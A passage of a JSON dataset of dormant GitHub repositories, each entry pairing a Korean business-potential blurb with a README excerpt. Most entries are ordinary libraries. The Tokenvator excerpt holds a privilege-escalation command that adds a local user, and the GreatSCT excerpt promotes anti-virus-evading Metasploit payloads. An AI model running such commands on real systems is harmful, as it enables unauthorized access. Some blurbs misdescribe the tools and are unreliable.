width=\"256\"/>\n        </td>\n        <td>\n            <img src=\"https://github.com/terrakok/Cicerone/raw/master/media/insta_tabs.gif\" width=\"256\"/>\n        </td>\n        <td>\n            <img src=\"https://github.c","composite_score":0.3085,"license_safety_tag":"unknown"},{"name":"alexjlockwood/ShapeShifter","github_url":"https://github.com/alexjlockwood/ShapeShifter","stars":6,"language":"TypeScript","license":"apache-2.0","abandonment_months":51,"description":"# ShapeShifter 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 복잡한 애니메이션을 자동으로 만들어주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발자를 위한 웹 기반 애니메이션 디자인 플랫폼으로 월 구독료 수익\n2. **내부 업무 도구**: 게임사나 앱 개발사의","readme_excerpt":"# Shape Shifter\n\n[![Build Status][travis-badge]][travis-badge-url]\n[![Coverage Status][coveralls-badge]][coveralls-badge-url]\n[![GitHub Stats](https://img.shields.io/badge/github-stats-ff5500.svg)](http://githubstats.com/alexjlockwood/ShapeShifter)\n\n**[Go to live version](https://shapeshifter.design)** or **[ask a question on Slack](https://join.slack.com/t/shapeshifterdesign/shared_invite/enQtNDAwODY5NjI2NTE4LTAyZTE3ZmYxNGUxMmViY2UwNDJjZWYyYzhhNTQzYmVkYmVmNTA0NmEyY2MwMmFiOTllODI5YzZmNDQwOTE1MGU)**\n\n-----\n\n[Shape Shifter](https://alexjlockwood.github.io/ShapeShifter/) is a web-app that simplifies\nthe creation of [icon animations][adp-icon-animations] for Android, iOS, and the web.\n\nThis tool currently exports to standalone SVGs, SVG spritesheets,\nand CSS keyframe animations for the web, as well as to\n[`AnimatedVectorDrawable`](https://developer.android.com/reference/android/graphics/drawable/AnimatedVectorDrawable.html)\nformat for Android. I am totally open to adding support for other ","composite_score":0.3085,"license_safety_tag":"safe"},{"name":"trogdoro/xiki","github_url":"https://github.com/trogdoro/xiki","stars":7,"language":"Ruby","license":"NOASSERTION","abandonment_months":78,"description":"# Xiki 프로젝트 분석\n\n## 왜 보물인가\n명령어를 직관적으로 실행하고 결과를 시각적으로 탐색할 수 있는 차세대 인터페이스로, 복잡한 기술 작업을 훨씬 쉽게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n**1. 내부 업무 도구 SaaS**\n- 기업의 반복적인 데이터 관리 작업(보고서 생성, 파일 정리)을 대시보드화한 도구로 판매\n- 비개발자도 복잡한 작업을 ","readme_excerpt":"## Xiki expands your command line\n\nXiki makes the command line friendlier and more powerful. Xiki Shell (xsh) lets you use Xiki from command line, in a way that augments your current favorite shell (bash or zsh).\n\n    $ xsh\n\n## Install\n\n### One-line installer\n\nIf you want a one-line installer, this should do the trick. Copy and paste it into your shell console.\n\n     curl -L https://xiki.com/install_xsh -o ~/install_xsh; bash ~/install_xsh\n\nIt will walk you through a couple setup steps.\n\n### Manual install\n\nYou can download Xiki from: https://github.com/trogdoro/xiki/archive/master.tar.gz. Extract it into your home dir, or some other dir where you keep projects or downloaded things.\n\nThen, to run (and optionally install xsh) just execute the 'xsh' command, located in the 'bin' dir:\n\n    $ ./install\n\n### Git Install\n\nOr, if you have git, you can get Xiki from github via \"git clone https://github.com/trogdoro/xiki.git\".  Then run \"./install\" from inside the dir.\n\n## Tutorial\n\nTry typing ","composite_score":0.3084,"license_safety_tag":"unknown"},{"name":"paypal/glamorous","github_url":"https://github.com/paypal/glamorous","stars":6,"language":"JavaScript","license":"mit","abandonment_months":91,"description":"# PayPal Glamorous 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 시각적 디자인을 빠르고 쉽게 만들 수 있는 오픈소스 도구로, PayPal이 직접 개발한 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디자인 작업 없이도 전문적인 외관의 웹 대시보드를 빠르게 구축하는 서비스\n- **내부 업무 도구**: 회사의 관리자 ","readme_excerpt":"# STATUS: DEPRECATED AND UNMAINTAINED\n\n**For details on the unmaintained status (and to help people with an automated migration to [emotion](https://emotion.sh)), see [#419](https://github.com/paypal/glamorous/issues/419).**\n\n<h1 align=\"center\">\n  <img src=\"https://github.com/paypal/glamorous/raw/master/other/logo/full.png\" alt=\"glamorous\" title=\"glamorous\" width=\"200\">\n  <br>\n  glamorous 💄\n  <br>\n</h1>\n<p align=\"center\" style=\"font-size: 1.2rem;\">Maintainable CSS with React</p>\n\n> Read [the intro blogpost][intro-blogpost] and [the v4 announcement blog post][v4-announcement-blogpost]\n\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![version][version-badge]][package]\n[![downloads][downloads-badge]][npmcharts]\n[![MIT License][license-badge]][license]\n\n[![All Contributors](https://img.shields.io/badge/all_contributors-67-orange.svg?style=flat-square)](#contributors)\n[![PRs Welcome][prs-badge]][prs]\n[![Chat][chat-badge]][chat]\n[![Code of Conduct][coc-ba","composite_score":0.3084,"license_safety_tag":"safe"},{"name":"Code-Bullet/SnakeFusion","github_url":"https://github.com/Code-Bullet/SnakeFusion","stars":6,"language":"Processing","license":"unknown","abandonment_months":68,"description":"# SnakeFusion 상용화 분석\n\n## 왜 보물인가\n인공지능이 직접 플레이하는 뱀 게임으로, 게임 개발이나 AI 학습 분야에서 실험용 도구로 활용할 수 있는 완성된 결과물입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 학습 플랫폼 (SaaS)**: 프로그래밍을 배우는 학생들이 \"AI가 게임을 어떻게 푸는지\" 시각적으로 배우는 온라인 교육 서비스\n2","readme_excerpt":"# SnakeFusion\nUsing the genetic algorithm and neural networks I trained up 5 snakes who will then fuse to become the ultimate snake, this is how I did it\n\nThe program I used to write and run this code was processing https://processing.org/download/\n\nIf you get it working some instructions\npress Space to just show the current best from  each population\npress d to double the mutation rate\npress h to halve it \nafter you run it some snakes will be saved press 0 to 4 to check them out\nto further train the snakes of legend (the saved snakes) press L\nto fuse snakes together to create a super snake press f\n\n\nI hope my commenting makes sense \n\nHave fun :)\n","composite_score":0.3084,"license_safety_tag":"unknown"},{"name":"frankiesardo/icepick","github_url":"https://github.com/frankiesardo/icepick","stars":5,"language":"Clojure","license":"epl-1.0","abandonment_months":61,"description":"# icepick 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 데이터를 간편하게 저장하고 관리할 수 있는 도구로, 개발자들의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱 개발 플랫폼에 내장하여 개발자들이 데이터 저장 기능을 쉽게 추가하도록 지원\n- **내부 업무 도구**: 안드로이드 개발팀이 자체 앱","readme_excerpt":"Icepick\n============\n\nIcepick is an Android library that eliminates the boilerplate of saving and restoring instance state.\nIt uses annotation processing to generate code that does bundle manipulation and key generation, so that you don't have to write it yourself.\n\n```java\nclass ExampleActivity extends Activity {\n  @State String username; // This will be automatically saved and restored\n\n  @Override public void onCreate(Bundle savedInstanceState) {\n    super.onCreate(savedInstanceState);\n    Icepick.restoreInstanceState(this, savedInstanceState);\n  }\n\n  @Override public void onSaveInstanceState(Bundle outState) {\n    super.onSaveInstanceState(outState);\n    Icepick.saveInstanceState(this, outState);\n  }\n\n  // You can put the calls to Icepick into a BaseActivity\n  // All Activities extending BaseActivity automatically have state saved/restored\n}\n```\n\nIt works for `Activities`, `Fragments` or any object that needs to serialize its state on a `Bundle` (e.g. mortar's [ViewPresenters](http","composite_score":0.3083,"license_safety_tag":"unknown"},{"name":"dalong982242260/AndroidCalendar","github_url":"https://github.com/dalong982242260/AndroidCalendar","stars":6,"language":"","license":"unknown","abandonment_months":97,"description":"# AndroidCalendar 저장소 분석\n\n## 왜 보물인가\n안드로이드 스마트폰에서 바로 사용할 수 있는 달력 앱을 직접 만들 수 있는 완성된 소스코드입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 일정 관리 앱**: 중소기업이 직원 일정과 회의실 예약을 함께 관리하는 업무 도구로 제공\n2. **학교 학사 일정 앱**: 학교에서 학생들에게 수업 시간표","readme_excerpt":"# AndroidCalendar\n\n[![知识共享协议（CC协议）](https://img.shields.io/badge/License-Creative%20Commons-DC3D24.svg)](https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh)\n[![GitHub stars](https://img.shields.io/github/stars/dalong982242260/AndroidCalendar.svg?style=flat&label=Star)](https://github.com/dalong982242260/AndroidCalendar/stargazers)\n[![GitHub forks](https://img.shields.io/github/forks/dalong982242260/AndroidCalendar.svg?style=flat&label=Fork)](https://github.com/dalong982242260/AndroidCalendar/fork)\n[![GitHub watchers](https://img.shields.io/github/watchers/dalong982242260/AndroidCalendar.svg?style=flat&label=Watch)](https://github.com/dalong982242260/AndroidCalendar/watchers)\n\nandroid日历收集demo\n\n1、Useful and powerful date picker for android\n\n![image](https://github.com/dalong982242260/AndroidCalendar/blob/master/img/calendar1.gif)\n\ngithub:https://github.com/AigeStudio/DatePicker\n\n\n2、Standalone Android widget for picking a single date from a calendar view.\n\n\n![image](https://github.","composite_score":0.3083,"license_safety_tag":"unknown"},{"name":"huangzehao/Super-Resolution.Benckmark","github_url":"https://github.com/huangzehao/Super-Resolution.Benckmark","stars":5,"language":"","license":"unknown","abandonment_months":70,"description":"# Super-Resolution.Benchmark 분석\n\n## 왜 보물인가\n흐릿한 사진을 선명하게 만드는 기술을 여러 방식으로 비교·평가할 수 있는 도구로, 이미지 품질 개선이 필요한 많은 산업에서 실용적 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 편집 앱에서 저해상도 이미지를 자동으로 고화질로 변환해주는 유료 기능\n","readme_excerpt":"# Super-Resolution.Benckmark\nA curated list of super-resolution resources and a benchmark for single image super-resolution algorithms.\n\nSee my implementated super-resolution algorithms:\n\n+ [SRGAN](https://github.com/huangzehao/torch-srgan)\n+ [VDSR](https://github.com/huangzehao/caffe-vdsr)\n+ [CSCN](https://github.com/huangzehao/SCN_Matlab)\n\n## TODO\nBuild a benckmark like [SelfExSR_Code](https://sites.google.com/site/jbhuang0604/publications/struct_sr)\n\n## State-of-the-art algorithms\n#### Classical Sparse Coding Method\n * ScSR [[Web]](http://www.ifp.illinois.edu/~jyang29/ScSR.htm)\n  * Image super-resolution as sparse representation of raw image patches (CVPR2008), Jianchao Yang et al.\n  * Image super-resolution via sparse representation (TIP2010), Jianchao Yang et al.\n  * Coupled dictionary training for image super-resolution (TIP2011), Jianchao Yang et al.\n \n#### Anchored Neighborhood Regression Method\n * ANR [[Web]](http://www.vision.ee.ethz.ch/~timofter/ICCV2013_ID1774_SUPPLEMENTARY","composite_score":0.3083,"license_safety_tag":"unknown"},{"name":"0xbadjuju/Tokenvator","github_url":"https://github.com/0xbadjuju/Tokenvator","stars":8,"language":"C#","license":"unknown","abandonment_months":32,"description":"","readme_excerpt":"# Tokenvator\nA tool to alter privilege with Windows Tokens\n\nFor documentation please see the wiki:<br> \nhttps://github.com/0xbadjuju/Tokenvator/wiki\n\nBuilding instructions can be found here:<br>\nhttps://github.com/0xbadjuju/Tokenvator/wiki/Building-Tokenvator\n\nThis project now utilizes [MonkeyWorks](https://github.com/NetSPI/MonkeyWorks), to clone issue the following command:<br>\n**git clone _--recursive_ https://github.com/0xbadjuju/Tokenvator.git**\n\n`Tokenvator.exe GetSystem /Process:3016 /command:'cmd.exe /c net user /add testuser Password1'`\n\n### Author, Contributors, and License\n\nAuthor: Alexander Polce Leary (@0xbadjuju), NetSPI - 2018\n\nLicense: BSD 3-Clause\n\nDependencies: \n[MonkeyWorks](https://github.com/0xbadjuju/MonkeyWorks)\n[DInvoke](https://github.com/TheWover/DInvoke)\n","composite_score":0.3083,"license_safety_tag":"unknown"},{"name":"code4craft/webmagic","github_url":"https://github.com/code4craft/webmagic","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":5,"description":"# WebMagic 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 데이터를 자동으로 수집하고 정리해주는 도구로, 비즈니스 인텔리전스가 필요한 모든 회사에서 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 경쟁사 가격 모니터링 SaaS**\n전자상거래 업체들이 경쟁사의 상품 가격을 실시간으로 추적하는 구독 서비스로 제공 가능합니다.\n\n**2. 부동산 ","readme_excerpt":"![logo](http://webmagic.io/images/logo.jpeg)\n\n[Readme in Chinese](https://github.com/code4craft/webmagic/tree/master/README-zh.md)\n\n\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/us.codecraft/webmagic-parent/badge.svg?subject=Maven%20Central)](https://maven-badges.herokuapp.com/maven-central/us.codecraft/webmagic-parent/)\n[![License](https://img.shields.io/badge/License-Apache%20License%202.0-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![Build Status](https://travis-ci.org/code4craft/webmagic.png?branch=master)](https://travis-ci.org/code4craft/webmagic)\n\n>A scalable crawler framework. It covers the whole lifecycle of crawler: downloading, url management, content extraction and persistent. It can simplify the development of a  specific crawler.\n\n## Features:\n\n* Simple core with high flexibility.\n* Simple API for html extracting.\n* Annotation with POJO to customize a crawler, no configuration.\n* Multi-thread and Distribution support.\n* Easy to be i","composite_score":0.3082,"license_safety_tag":"safe"},{"name":"you-dont-need/You-Dont-Need.com","github_url":"https://github.com/you-dont-need/You-Dont-Need.com","stars":23,"language":"","license":"unknown","abandonment_months":57,"description":"","readme_excerpt":"English | [简体中文](./README-zh_CN.md)\n\n<div align=\"center\">\n\n# You Don't Need\n<a href=\"https://github.com/you-dont-need\">\n  <img src=\"logo.jpg\" width=\"200\" alt=\"Logo\"></img>\n</a>  \n\nPeople choose popular projects, often not because it applies to their problems.  \n\n[![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\n\n</div>\n\n## Contents\n\n- [Packages](#packages)\n  - [JavaScript Packages](#javascript-packages)\n- [Languages](#languages)\n- [Programming Practices](#programming-practices)\n- [Miscellaneous](#miscellaneous)\n\n## Packages\n\n### JavaScript Packages\n\n- [You don't (may not) need Lodash/Underscore](https://github.com/you-dont-need/You-Dont-Need-Lodash-Underscore) - List of JavaScript methods which you can use natively + ESLint Plugin.\n- [You don't (may not) need Moment.js](https://github.com/you-dont-need/You-Dont-Need-Momentjs) - List of date-fns or native functions which you can use to replace moment.js.\n- [You Might Not Need Redux](https://medium.com/@dan_abramov/you-migh","composite_score":0.3081,"license_safety_tag":"unknown"},{"name":"yanagishima/yanagishima","github_url":"https://github.com/yanagishima/yanagishima","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":32,"description":"# Yanagishima 상용화 분석\n\n## 왜 보물인가\n대규모 데이터를 다루는 기업들이 복잡한 데이터 분석을 웹브라우저에서 간편하게 할 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 플랫폼으로 기업들에게 월 구독료를 받고 데이터 조회 기능 제공\n2. **내부 업무 도구**: 대기업의 마케팅/영업팀이 ","readme_excerpt":"<p align=\"center\">\n    <img alt=\"Yanagishima Logo\" src=\"docs/images/yanagishima.png\" width=\"25%\" />\n</p>\n<p align=\"center\">Yanagishima is an open-source Web application for Trino, Hive and Spark.</p>\n<p align=\"center\">Visit <a href=\"https://yanagishima.github.io/yanagishima\">the official web site</a> for more information.</p>\n<p align=\"center\">\n   <a href=\"https://github.com/yanagishima/yanagishima/actions?query=workflow%3ACI+event%3Apush+branch%3Amaster\">\n       <img src=\"https://github.com/yanagishima/yanagishima/workflows/CI/badge.svg\" alt=\"CI\" />\n   </a>\n   <a href=\"http://www.youtube.com/watch?v=SoneFYNCXJEr\">\n       <img src=\"https://img.shields.io/badge/YouTube-Video-FF0000\" alt=\"YouTube Video\" />\n   </a>\n</p>\n\n# Build requirements\n\n* Java 11\n* Node.js\n\n## Quick Start\n```\ngit clone https://github.com/yanagishima/yanagishima.git\ncd yanagishima\ngit checkout -b [version] refs/tags/[version]\n./gradlew distZip\ncd build/distributions\nunzip yanagishima-[version].zip\ncd yanagishima-[ver","composite_score":0.3081,"license_safety_tag":"safe"},{"name":"fossasia/2018.fossasia.org","github_url":"https://github.com/fossasia/2018.fossasia.org","stars":11,"language":"HTML","license":"unknown","abandonment_months":47,"description":"# 2018.fossasia.org 저장소 분석\n\n## 왜 보물인가\n2018년 FOSSASIA 컨퍼런스의 공식 웹사이트 코드로, 대규모 국제 기술 행사 운영 경험과 웹사이트 구축 노하우가 담겨 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이벤트 관리 SaaS 서비스**\n- 컨퍼런스, 세미나, 전시회 등 행사 웹사이트를 자동으로 만들어주는 온라인 도구\n\n","readme_excerpt":"Site for 2018.fossasia.org Summit\n\nhttp://2018.fossasia.org\n","composite_score":0.3081,"license_safety_tag":"unknown"},{"name":"GreatSCT/GreatSCT","github_url":"https://github.com/GreatSCT/GreatSCT","stars":11,"language":"Python","license":"gpl-3.0","abandonment_months":64,"description":"# GreatSCT 상용화 분석\n\n## 왜 보물인가\n보안 전문가들이 시스템 방어력을 테스트하기 위해 사용하는 도구로, 사이버 보안 시장에서 꾸준한 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 보안 취약점을 자동으로 진단해주는 클라우드 기반 검사 서비스\n- **내부 업무 도구**: 은행·공공기관의 IT 부서가 자체 시스템 ","readme_excerpt":"# GreatSCT\n\nGreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.\n\nGreatSCT is current under support by @ConsciousHacker\n\n## Software Requirements:\n\n### Linux\n\n1.  Kali - run the setup script - sudo ./setup.sh -c\n\n> NOTE: Support for distributions other than Kali Linux will be coming soon.\n\n## Setup (tl;dr)\n\n> NOTE: Installation must be done with superuser privileges. If you are not using Kali Linux, prepend each command with `sudo` or change to the root user before beginning.\n\nRun `./setup.sh -c` on Linux.\n\nInstall by cloning from git, not via apt!\n\n### Quick Install\n\n```bash\napt-get -y install git\ngit clone https://github.com/GreatSCT/GreatSCT.git\ncd GreatSCT/\ncd setup\nsudo ./setup.sh -c\n```\n\n### Regenerating Config\n\n> NOTE: This must be done with superuser privileges. If you are not using Kali Linux, prepend each command with `sudo` or change to the root user before beginning.\n\nMost of the time the","composite_score":0.308,"license_safety_tag":"restricted"},{"name":"80vul/phpcodz","github_url":"https://github.com/80vul/phpcodz","stars":6,"language":"","license":"unknown","abandonment_months":131,"description":"# phpcodz 저장소 분석\n\n## 왜 보물인가\nPHP 웹사이트의 보안 취약점을 찾아내는 자동화 도구로, 중소 웹개발사들이 비용 절감하면서 안전한 코드를 만드는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 보안 검사 플랫폼으로 개발사들이 월 구독으로 자신의 코드를 자동 진단받기\n2. **내부 업무 도구*","readme_excerpt":"# phpcodz\nPhp Codz Hacking (http://www.80vul.com/pch/)\n\n### What is PHP?\n> PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. If you are new to PHP and want to get some idea of how it works, try the introductory tutorial. After that, check out the online manual, and the example archive sites and some of the other resources available in the links section.\n\n### About PCH[Php Codz Hacking]\n> 本项目主要是在php源代码的基础上去分析容易导致php应用程序的一些安全问题的根本所在,指导我们发现更加多的关于php的一些'特性'或漏洞.\n\n### Research\n| Item      |    Title |\n| :-------- | :--------|\n| PCH-034   | [Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList](https://github.com/80vul/phpcodz/blob/master/research/pch-034.md) |\n| PCH-033   | [Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage](https://github.com/80vul/phpcodz/blob/master/research/pch-033.md) |\n| PCH-032   | [Use After Free Vulnerability in unserialize()","composite_score":0.3079,"license_safety_tag":"unknown"},{"name":"cloudfavorites/favorites-web","github_url":"https://github.com/cloudfavorites/favorites-web","stars":13,"language":"HTML","license":"unknown","abandonment_months":11,"description":"# favorites-web 보물 분석 보고서\n\n## 왜 보물인가\n자신이 좋아하는 웹사이트들을 한곳에 모아 관리할 수 있는 개인 북마크 서비스로, 온라인에서 발견한 유용한 정보를 체계적으로 정리하고 싶은 사람들의 니즈를 충족합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 기반 '스마트 북마크 관리 앱'으로 무료 사용자는 100개 사이","readme_excerpt":"![](http://favorites.ren/img/icon.ico)\n![](http://favorites.ren/index/img/profile.png)\n\n云收藏 - 让收藏更简单\n=========================\n\n![Spring Boot 2.0](https://img.shields.io/badge/Spring%20Boot-2.0-brightgreen.svg)\n![Thymeleaf 3.0](https://img.shields.io/badge/Thymeleaf-3.0-yellow.svg)\n![Mysql 5.6](https://img.shields.io/badge/Mysql-5.6-blue.svg)\n![JDK 1.8](https://img.shields.io/badge/JDK-1.8-brightgreen.svg)\n![Maven](https://img.shields.io/badge/Maven-3.5.0-yellowgreen.svg)\n![license](https://img.shields.io/badge/license-MPL--2.0-blue.svg)\n \n\n云收藏是一个使用 Spring Boot 构建的开源网站，可以让用户在线随时随地收藏的一个网站，在网站上分类整理收藏的网站或者文章，可以作为稍后阅读的一个临时存放。作为一个开放开源的软件，可以让用户从浏览器将收藏夹内容导入到云收藏，也支持随时将云收藏收集的文章导出去做备份。 \n\n网站可以查看别人公开收藏的内容，了解同行业内的大拿都在学习什么，方便学习、整理、检索，根据共同的收藏内容我们可以帮您找到**最熟悉的陌生人** :)。\n\n\n[官方主页](http://favorites.ren) | [github地址](https://github.com/cloudfavorites/favorites-web) | [码云地址](https://gitee.com/ityouknow/favorites-web) | [中文说明](http://www.ityouknow.com/springboot/2016/09/26/spring-boot-opensource-favorites.htm","composite_score":0.3079,"license_safety_tag":"unknown"},{"name":"sindresorhus/pokemon","github_url":"https://github.com/sindresorhus/pokemon","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":15,"description":"# Pokemon 저장소 분석\n\n## 왜 보물인가\n포켓몬 게임에 등장하는 모든 캐릭터 정보를 정리한 데이터베이스로, 게임·앱·웹사이트 개발 시 즉시 활용할 수 있는 검증된 자료입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 포켓몬 팬을 위한 도감 앱·웹사이트 (도감 기능, 검색 기능, 통계 분석)\n- **내부 업무 도구**: 포켓몬 관련 콘","readme_excerpt":"# pokemon\n\n> Get [Pokémon](https://en.wikipedia.org/wiki/Pok%C3%A9mon) names\n\nThe name list is just a [JSON file](data/en.json) and can be used wherever.\n\n![](header.jpg)\n\n## Install\n\n```sh\nnpm install pokemon\n```\n\n## Usage\n\n```js\nconst pokemon = require('pokemon');\n\npokemon.all();\n//=> ['Bulbasaur', …]\n\npokemon.random();\n//=> 'Snorlax'\n\npokemon.getName(147);\n//=> 'Dratini'\n\npokemon.getId('Dratini');\n//=> 147\n```\n\n## API\n\n### .all(language?)\n\nGet all Pokémon names as a `string[]`.\n\n#### language\n\nType: `string`\\\nDefault: `'en'`\n\n[Language code](#supported-languages) to retrieve the list of Pokémon for.\n\n```js\npokemon.all();\n//=> ['Bulbasaur', …]\npokemon.all('de');\n//=> ['Bisasam', …]\n```\n\n### .random(language?)\n\nGet random Pokémon name.\n\n#### language\n\nType: `string`\\\nDefault: `'en'`\n\n[Language code](#supported-languages) to retrieve the Pokémon for.\n\n```js\npokemon.random();\n//=> 'Vigoroth'\npokemon.random('de');\n//=> 'Muntier'\n```\n\n### .getName(id, language?)\n\nGet Pokémon name from ID.","composite_score":0.3079,"license_safety_tag":"safe"},{"name":"woj-ciech/kamerka","github_url":"https://github.com/woj-ciech/kamerka","stars":8,"language":"","license":"unknown","abandonment_months":72,"description":"# kamerka 저장소 분석\n\n## 왜 보물인가\n카메라와 네트워크 장비를 찾아서 관리할 수 있는 도구로, 보안 감시가 필요한 모든 조직에서 유용하게 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 건물 관리사와 보안팀을 위한 네트워크 카메라 자동 탐지 및 인벤토리 관리 플랫폼\n2. **내부 업무 도구**: 대규모 시설(공장, 병","readme_excerpt":"# NOT SUPPORTED OR DEVELOPED ANYMORE\n# PLEASE USE GUI VERSION\nhttps://github.com/woj-ciech/Kamerka-GUI\n\n# ꓘamerka 2.0 aka FIST (Flickr, Instagram, Shodan, Twitter)\n*Build interactive map of cameras, printers, tweets and photos.* \n\nThe script creates a map of cameras, printers, tweets and photos based on your coordinates. Everything is clearly presented in form of interactive map with icons and popups.\n\nDetailed write-up\nhttps://medium.com/@woj_ciech/hunting-with-%EA%93%98amerka-2-0-aka-fist-flickr-instagram-shodan-twitter-ca363f12562a\n\nPrevious version https://medium.com/@woj_ciech/%EA%93%98amerka-build-interactive-map-of-cameras-from-shodan-a0267849ec0a\n\n# v4 update\nAdded RTSP (Real-Time Streaming Protocol)\n ![](https://i.imgur.com/diuLuHd.jpg)\n \n MQTT (Message Queue Telemetry Transport).\n![](https://i.imgur.com/LAscLR2.jpg)\n\nElasticsearch output\n![](https://i.imgur.com/ZuHhbf4.jpg)\n\nAdditional:\n- recursive mode (check each host for open ports and more information)\n- \"Check ownership\"","composite_score":0.3078,"license_safety_tag":"unknown"},{"name":"inspirehep/magpie","github_url":"https://github.com/inspirehep/magpie","stars":10,"language":"Python","license":"mit","abandonment_months":40,"description":"# Magpie 저장소 분석\n\n## 왜 보물인가\n학술 논문과 연구 자료를 자동으로 분류하고 정리해주는 도구로, 연구자들의 정보 관리 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학 도서관이나 연구기관向 논문 자동 분류 웹 서비스로 월 구독료 수취\n2. **내부 업무 도구**: 대형 출판사의 편집팀이 투고된 원고","readme_excerpt":"![image](docs/img/logo.png)\n\nMagpie is a deep learning tool for multi-label text classification. It learns on the training corpus to assign labels to arbitrary text and can be used to predict those labels on unknown data. It has been developed at CERN to assign subject categories to High Energy Physics abstracts and extract keywords from them.\n\n## Very short introduction\n```\n>>> magpie = Magpie()\n>>> magpie.init_word_vectors('/path/to/corpus', vec_dim=100)\n>>> magpie.train('/path/to/corpus', ['label1', 'label2', 'label3'], epochs=3)\nTraining...\n>>> magpie.predict_from_text('Well, that was quick!')\n[('label1', 0.96), ('label3', 0.65), ('label2', 0.21)]\n```\n\n\n## Short introduction\nTo train the model you need to have a large corpus of labeled data in a text format encoded as UTF-8. An example corpus can be found under data/hep-categories directory. Magpie looks for `.txt` files containing the text to predict on and corresponding `.lab` files with assigned labels in separate lines. A pair ","composite_score":0.3078,"license_safety_tag":"safe"},{"name":"JakeWharton/kotterknife","github_url":"https://github.com/JakeWharton/kotterknife","stars":7,"language":"Kotlin","license":"apache-2.0","abandonment_months":82,"description":"# JakeWharton/kotterknife 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적인 작업을 자동화하여 개발 속도를 크게 높일 수 있는 실용 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 앱 개발사의 내부 개발 도구**: 개발팀이 앱 만들 때 필수 유틸리티로 제공하여 생산성 향상\n2. **앱 개발 학원/부트캠프의 교육용 플랫","readme_excerpt":"Kotter Knife\n============\n\n**Deprecated**: This was a terrible idea because it allocates an object for every view reference.\nDo not use, and do not use anything like it.\nUse [view binding](https://developer.android.com/topic/libraries/view-binding) instead.\n\n![](art/logo.png)\n\n[Butter Knife][1]-esque view binding for Kotlin.\n\n```kotlin\npublic class PersonView(context: Context, attrs: AttributeSet?) : LinearLayout(context, attrs) {\n  val firstName: TextView by bindView(R.id.first_name)\n  val lastName: TextView by bindView(R.id.last_name)\n\n  // Optional binding.\n  val details: TextView? by bindOptionalView(R.id.details)\n\n  // List binding.\n  val nameViews: List<TextView> by bindViews(R.id.first_name, R.id.last_name)\n\n  // List binding with optional items being omitted.\n  val nameViews: List<TextView> by bindOptionalViews(R.id.first_name, R.id.middle_name, R.id.last_name)\n}\n```\n\nThese methods are available on subclasses of `Activity`, `Dialog`, `ViewGroup`, `Fragment`,\nthe support library","composite_score":0.3077,"license_safety_tag":"safe"},{"name":"stevenpetryk/mafs","github_url":"https://github.com/stevenpetryk/mafs","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# stevenpetryk/mafs 분석 보고서\n\n## 왜 보물인가\n수학 문제를 시각적으로 그려주고 정확하게 풀어주는 도구로, 학생부터 전문가까지 수학을 더 쉽고 재미있게 배우고 활용할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼**\n학원이나 온라인 강의 사이트에 내장하여 학생들이 수학 개념을 직관적으로 이해하도록 돕는 기능으","readme_excerpt":"# Mafs\n\nMafs is a set of opinionated React components for creating math visualizations.\n\n[Visit the docs →](https://mafs.dev)\n\n---\n\n## Development\n\nDevelopment is done inside of the Next.js documentation site, which directly\nimports Mafs components from `src/`. To start the development server, run:\n\n```\npnpm install\npnpm start\n```\n\nThe version of `pnpm` in use can be viewed by checking the `packageManager`\nfield of `package.json`. Using `corepack` to install pnpm will keep this\nup-to-date automatically. Mafs pins pnpm to a precise version to avoid spurious\npnpm-lock.yaml changes.\n\nThen visit [localhost:3000](http://localhost:3000).\n\n## Tests\n\nMafs uses unit, end-to-end, and visual regression testing to ensure consistency between updates. It takes literal screenshots of components as rendered by the browser, and compares them to a known \"correct\" screenshot. Two of the browsers may require a Mac to run (Safari and iOS Safari).\n\nAll examples on the documentation site are visually tested ","composite_score":0.3077,"license_safety_tag":"safe"},{"name":"electronicarts/EACopy","github_url":"https://github.com/electronicarts/EACopy","stars":5,"language":"C++","license":"BSD-3-Clause","abandonment_months":15,"description":"# EACopy 상품화 분석\n\n## 왜 보물인가\n컴퓨터에서 대량의 파일을 매우 빠르게 복사해주는 도구로, 게임 회사들이 매일 사용하는 핵심 인프라 기술입니다.\n\n## 어디에 